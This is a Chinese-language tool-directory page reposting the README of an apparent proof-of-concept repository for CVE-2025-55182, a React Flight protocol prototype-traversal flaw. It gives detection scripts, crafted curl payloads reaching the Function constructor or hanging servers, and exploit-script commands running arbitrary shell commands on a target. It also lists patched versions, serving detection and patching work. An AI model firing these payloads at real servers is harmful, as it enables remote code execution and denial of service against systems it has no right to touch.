Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-poc — 真实的 CVE-2025-55182 检测与利用。不要废话的 LLMs。 | Kitploit
工具/GitHubGitHub/acheong08/cve-2025-55182-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubacheong08/cve-2025-55182-poc

CVE-2025-55182-poc

真实的 CVE-2025-55182 检测与利用。不要废话的 LLMs。

查看仓库
10119个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182

React Flight 协议漏洞,允许通过块引用进行原型链遍历。针对 bullshit-react-project 进行测试。

检测

以下内容略有过时,因为实际 PoC 现已公开。

Vite RSC:bash ./vite-detect.sh https://example.com
Next.js:bash ./nextjs-detect.sh https://example.com

或者同时检测两者,只需运行 bash ./detect.sh https://example.com

两个脚本都接受可选的超时参数(Vite 默认 3 秒,Next.js 默认 5 秒)。

Vite 检测原理

发送带有 $1:toString 负载的 x-rsc-action 请求头。易受攻击的服务器会无限期挂起,已修补的服务器正常响应。首先检查 RSC 端点(无效操作时预期返回 HTTP 500)。

Next.js 检测原理

从页面响应中发现服务器操作 ID(格式为 $ACTION_ID_<hash>),然后发送:

curl -X POST "http://localhost:3000" \
  -H "Next-Action: <action_id>" \
  -H "Accept: text/x-component" \
  -F '0=["$1:a:a"]' \
  -F '1={}'

易受攻击的服务器挂起,已修补的服务器快速响应。

修补

Next.js:升级到 16.0.7、15.5.7 或 15.4.8
React (Vite RSC):升级到 19.0.1+、19.1.2+ 或 19.2.1+

漏洞详情

React 的 Flight 协议允许通过块引用进行原型链遍历。getOutlinedModel 函数在迭代引用路径时未进行 hasOwnProperty 检查:

for (key = 1; key < reference.length; key++)
  parentObject = parentObject[reference[key]];

这使得 $1:constructor:constructor 能够遍历 {}.constructor.constructor → Function。

手动测试(Vite RSC)

端点:任何带有 x-rsc-action 请求头的路径
操作 ID:710363d987f5#loginUser(或任何有效的服务器操作)

PoC:调用 Function 构造函数

curl -X POST "http://localhost:4173/xyz" \
  -H "x-rsc-action: 710363d987f5#loginUser" \
  -F '0={"then":"$1:constructor:constructor"}' \
  -F '1={"a":"b"}'

易受攻击:Internal Server Error
已修补:正常响应

注意,如果 x-rsc-action ID 错误,已修补的服务器也会返回 500 错误,只是服务器日志不同。

服务器日志(易受攻击,始终如此)

SyntaxError: Unexpected token 'function'
    at Object.Function [as then] (<anonymous>)

当对象被 await 时,通过 .then() 调用了 Function 构造函数。V8 将 resolve/reject 函数作为参数传递,这些函数会被字符串化为 function () { [native code] }——因此产生语法错误。

服务器日志(已修补,无效的 x-rsc-action)

Error: server reference not found '310363d987f5'
    at Object.load (file:///tmp/team_9_year_3_project/dist/rsc/index.js:13532:27)
    at requireModule (file:///tmp/team_9_year_3_project/dist/rsc/index.js:8302:20)
    at loadServerAction (file:///tmp/team_9_year_3_project/dist/rsc/index.js:8326:17)
    at handler (file:///tmp/team_9_year_3_project/dist/rsc/index.js:14998:29)
    at process.processTicksAndRejections (node:internal/process/task_queues:103:5)
TypeError: Cannot read properties of undefined (reading 'apply')
    at AsyncLocalStorage.run (node:internal/async_local_storage/async_context_frame:63:14)
    at runWithRequest (file:///tmp/team_9_year_3_project/dist/rsc/index.js:13539:25)
    at handler (file:///tmp/team_9_year_3_project/dist/rsc/index.js:14999:27)
    at process.processTicksAndRejections (node:internal/process/task_queues:103:5)

使用有效的 x-rsc-action 时不会出现服务器日志。可以通过运行一个真实的服务器操作并在开发者工具中捕获请求来找到正确的 x-rsc-action。

备注

$1:toString 负载会导致易受攻击的服务器无限期挂起——这也是检测脚本所使用的。我尝试了几乎所有方法,但未能实现 RCE。

利用

对于 Vite RSC:

bash exploit-vite.sh https://example.com/ 'echo $(id) > /tmp/pwned'

对于 Next.js:

bash exploit-nextjs.sh https://example.com/ 'echo $(id) > /tmp/pwned'

感谢 maple3142 → https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3

我只是做了一些封装并适配了 Vite,它使用纯 ESM,因此没有 require。

下载工具